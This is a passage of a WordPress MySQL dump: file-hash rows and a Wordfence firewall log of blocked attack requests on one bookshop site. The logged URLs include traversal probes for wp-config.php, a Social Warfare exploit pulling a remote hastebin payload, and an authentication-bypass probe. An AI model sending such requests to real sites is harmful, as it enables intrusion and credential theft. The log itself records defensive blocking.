V���7r�LKs&��G�','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.�	�ח','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$	����\n�VFv�ʸ��_�K~\\','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�|��MW���j(�޻','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���W�\\�.��A .','��b�D���Z�	6A��m�wl�r�E��0��','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�0�w��t�Nl嬣','܂s�H�<�&�`�vЖX+v^=0�O]�?!�`','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�7w��R��«���','9���\0*Ǔ��]S���J_>+=J�-�AoC','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ƛ�;��^\'��pD?�','�i��`)��\'B�O�踴ǹ�Z{�B�$D�87\0','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�dEWOj��$���,W','wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/readme.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=����l�!�','r��1\"K��PZDز7�N��bj|��_o�Q�J��#','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h�x��T�g�/x�','(� 	7D�T��M^�����f\0��v�E','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?�	�G�1','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ�	�}��{~YB�v','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('��m36��j	ʆ�<�','wp-content/themes/magazine-hoot/hybrid/extend/customize/interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B��t���0�|=\'','RE!E���j@�-#c�c����k�5�yǠ�','',0,'?'),('�	@#^ٚE_��i��','wp-content/themes/magazine-hoot/hybrid/customize/control-select-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\n�j�ھn�\0%%�?D','�C����Q���Mkj(���7Њ+x=�*j1�T','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�?.O��4�o��V֡','��f��ɲ��AE�u�k���L�t+KZ	�Ť�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�:�x��r�','�LK��3)�5����\0r�q]�l���>��1�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','�����–����%*�kb$�ZR��f�i�`�','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z�	h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�W��:�.p�j[yyQ','v�6$�-���ȓ��k�Z��Op��]�\"�r5','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=1022 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (863,1627346045.575464,1627346045.130800,'\0\0\0\0\0\0\0\0\0\0���Mo�',0,403,0,0,0,'https://www.ashbooks.co.uk/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php','http://www.ashbooks.co.uk/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbnN0YWxsX2RlbW9fbmFtZV0=\",\"paramValue\":\"Li4vZGF0YS9hZG1pbi9jb25maWdfdXBkYXRlLnBocA==\",\"path\":\"L2luc3RhbGwvaW5kZXgucGhwLmJhaw==\",\"category\":\"lfi\",\"ssl\":1}'),(864,1627346255.835493,1627346255.714200,'\0\0\0\0\0\0\0\0\0\0���Mo�',0,403,0,0,0,'https://www.ashbooks.co.uk/install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php','http://www.ashbooks.co.uk/install/index.php?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbnN0YWxsX2RlbW9fbmFtZV0=\",\"paramValue\":\"Li4vZGF0YS9hZG1pbi9jb25maWdfdXBkYXRlLnBocA==\",\"path\":\"L2luc3RhbGwvaW5kZXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(865,0.000000,1627439526.907995,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://ashbooks.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(866,1627481691.689111,1627481691.314000,'\0\0\0\0\0\0\0\0\0\0��g�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(867,1627484466.843549,1627484466.387600,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(868,1627484485.429909,1627484484.597300,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(869,1627484501.681872,1627484501.227900,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(870,1627484581.111245,1627484580.682000,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(871,1627484579.219306,1627484578.780600,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(872,1627511270.632388,1627511270.074300,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(873,1627511284.543944,1627511284.388600,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(874,1627511298.945355,1627511298.822300,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(875,1627511361.456336,1627511361.018100,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(876,1627511359.557166,1627511359.121800,'\0\0\0\0\0\0\0\0\0\0��g{?',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(877,1627736017.600399,1627736016.776900,'\0\0\0\0\0\0\0\0\0\0���k�?',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(878,1627803884.168512,1627803883.943200,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(879,1627803938.224596,1627803937.762100,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(880,1627803936.976203,1627803936.532100,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(881,1627803936.014832,1627803935.233300,'\0\0\0\0\0\0\0\0\0\0��(w0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 